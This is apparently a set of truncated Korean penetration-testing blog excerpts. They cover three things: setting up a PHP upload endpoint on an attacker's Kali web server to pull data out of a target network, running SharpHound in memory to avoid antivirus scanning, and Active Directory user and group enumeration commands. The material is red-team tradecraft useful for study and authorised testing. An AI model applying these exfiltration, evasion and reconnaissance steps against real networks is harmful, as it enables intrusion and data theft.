윈도우 스크립트 언어로 파일 업로드 (데이터 유출)타겟 네트워크에서 윈도우 클라이언트를 통해 데이터 외부에 빼내야 할 때가 있음. 아웃바운드 HTTP 통신 열려있으면 칼리 Web Root(/var/www/html) 디렉토리에 아래 PHP 스크립트 만들어서 upload.php로 저장해두면 됨. 그 다음 uploads 폴더 새로 생성하고 www-data 유저가 파일 쓸 수 있게 소유권이랑 쓰기 권한 넘겨줘야 함kali@kali:/var/www$ sudo mkdir /var/www/uploadskali@kali:/var/www$ ps -ef | grep apachekali@kali:/var/www$ sudo chown www-data: /var/www/uploadskali@kali:/var/www$ ls -l..
샤프하운드샤프하운드 수집기는 두 종류가 있음:SharpHound.ps1: 샤프하운드 실행용 파워셸 스크립트. 최신 버전부턴 파워셸 스크립트 형태로는 안 나옴. RAT랑 쓸 때 좋음. 스크립트 바로 메모리에 띄울 수 있어서 디스크 백신 검사를 피할 수 있음SharpHound.exe: 윈도우 실행파일 버전. 둘 다 여기 있음: https://github.com/BloodHoundAD/SharpHound/releasesAll이랑 Session 수집 옵션 주고 샤프하운드 돌리는 법: cmd> Sharphound.exe --CollectionMethods All --Domain asd.domain.com --ExcludeDCs 다 돌고 나면 실행했던 폴더에 시간 박힌 ZIP 파일이 생성됨 블러드하운드칼리 리눅스..
유저 / 그룹 / 컴퓨터 (Users / Groups / Computers)Domain Admins나 파생된 Local Admins 같은 도메인 내 고권한 유저 훑어보기. 커스텀 그룹도 같이 찾아봄.# 도메인 내 전체 유저 리스트 뽑기cmd> net user /domainPS > Get-NetUser | select cn # PowerView.ps1 사용# 특정 유저 상세 정보 보기 cmd> net user [username] /domain # 소속 그룹이 10개 넘어가면 cmd 명령어는 에러남PS > Get-ADUser -Identity -Server asd.domain.com -Properties * # 파워쉘# 도메인 내 전체 그룹 리스트 뽑기cmd> net group /domainPS > Get..